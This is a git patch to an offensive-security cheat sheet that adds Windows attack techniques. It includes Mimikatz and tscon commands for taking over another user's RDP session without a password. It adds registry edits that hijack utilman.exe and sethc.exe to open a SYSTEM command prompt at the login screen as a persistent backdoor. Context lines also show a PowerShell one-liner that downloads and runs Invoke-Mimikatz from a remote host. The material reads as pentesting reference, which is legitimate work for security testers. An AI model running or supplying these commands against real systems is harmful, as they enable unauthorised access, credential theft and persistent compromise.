From c60f2646644584c18ddd376e59a8b01752a8a1a9 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 26 Nov 2019 23:39:14 +0100
Subject: [PATCH] RDP backdoor + RDP session takeover

---
 .../Active Directory Attack.md                |  6 ++++++
 .../Windows - Mimikatz.md                     | 17 ++++++++++++++++
 .../Windows - Persistence.md                  | 20 +++++++++++++++++++
 3 files changed, 43 insertions(+)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 1a0baaf..d709ed4 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -124,6 +124,12 @@
   powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
   ```
 
+* [ADRecon](https://github.com/sense-of-security/ADRecon)
+
+  ```powershell
+  .\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser
+  ```
+
 * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
 
     ```powershell
diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md
index 6e28b25..6a40954 100644
--- a/Methodology and Resources/Windows - Mimikatz.md	
+++ b/Methodology and Resources/Windows - Mimikatz.md	
@@ -70,6 +70,23 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
 rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
 ```
 
+## Mimikatz RDP session takeover
+
+Run tscon.exe as the SYSTEM user, you can connect to any session without a password.
+
+```powershell
+privilege::debug 
+token::elevate 
+ts::remote /id:2 
+```
+
+```powershell
+# get the Session ID you want to hijack
+query user
+create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
+net start sesshijack
+```
+
 ## Mimikatz commands
 
 | Command |Definition|
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index d005bd8..ea1ccb7 100644
--- a/Methodology and Resources/Windows - Persistence.md	
+++ b/Methodology and Resources/Windows - Persistence.md	
@@ -11,6 +11,7 @@
     * [HKLM](#hklm)
     * [Services](#services)
     * [Scheduled Task](#scheduled-task)
+    * [RDP Backdoor](#rdp-backdoor)
 * [References](#references)
 
 
@@ -114,6 +115,25 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
 PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ```
 
+### RDP Backdoor
+
+#### utilman.exe
+
+At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.
+
+```powershell
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
+```
+
+#### sethc.exe
+ 
+Hit F5 a bunch of times when you are at the RDP login screen.
+
+```powershell
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
+```
+
+
 ## References
 
 * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)